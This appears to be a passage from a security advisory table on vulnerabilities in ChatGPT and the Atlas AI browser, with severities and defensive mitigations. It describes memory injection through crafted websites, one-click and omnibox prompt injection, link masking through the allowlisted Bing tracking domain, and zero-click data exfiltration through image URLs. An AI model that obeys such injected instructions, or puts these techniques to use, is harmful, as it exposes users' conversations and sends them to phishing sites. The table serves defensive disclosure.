SSRF in pictureproxy.php of ChatGPT codebase. Allows attackers to inject malicious URLs into input parameters, forcing the application to make unintended requests. Over 10,000 attacks in one week. Note: OpenAI disputed the attribution, stating the vulnerable repo was not part of ChatGPT's production systems.
WAF rules for SSRF patterns; URL validation on all input parameters; monitor for SSRF indicators in logs
Memory Injection (Tenable, 2025)
High
Seven vulnerabilities in GPT-4o and GPT-5 models. CSRF flaw allows injecting malicious instructions into ChatGPT's persistent memory via crafted websites. Corrupted memory persists across devices and sessions.
Periodically review stored memories; be cautious when asking ChatGPT to summarize untrusted websites
One-Click Prompt Injection
Medium
Crafted URLs in format chatgpt.com/?q={Prompt} auto-execute queries when clicked. Combined with other techniques for data exfiltration.
bing.com is allowlisted as safe in ChatGPT. Bing ad tracking links (bing.com/ck/a) can mask malicious URLs, rendering them in chat as trusted links.
Don't trust links rendered in ChatGPT output without independent verification
Zero-Click Data Exfiltration
High
Indirect prompt injection via browsing context causes ChatGPT to exfiltrate conversation data by rendering images with data encoded in URL parameters to attacker-controlled servers.
Output filtering for encoded data in URLs; restrict image rendering from untrusted domains
Malicious websites inject persistent instructions into Atlas browser memories. Corrupted memory persists across sessions and can control future AI behavior.
Regularly audit browser memories; avoid browsing untrusted sites with Atlas
Clipboard Hijacking
High
Hidden "copy to clipboard" actions on web pages overwrite clipboard with malicious links when Atlas navigates the site. Later paste actions redirect to phishing sites.
Don't paste content from clipboard after Atlas browsing sessions without inspection
Weak Anti-Phishing
High
LayerX testing showed Atlas stopped only 5.8% of malicious web pages (vs. 53% for Edge, 47% for Chrome).
Don't rely on Atlas as a primary browser; use traditional browsers with better security controls
Prompt Injection via Omnibox
Medium
Atlas omnibox can be jailbroken by disguising malicious prompts as URLs.
Treat Atlas as an untrusted execution environment; don't use for sensitive browsing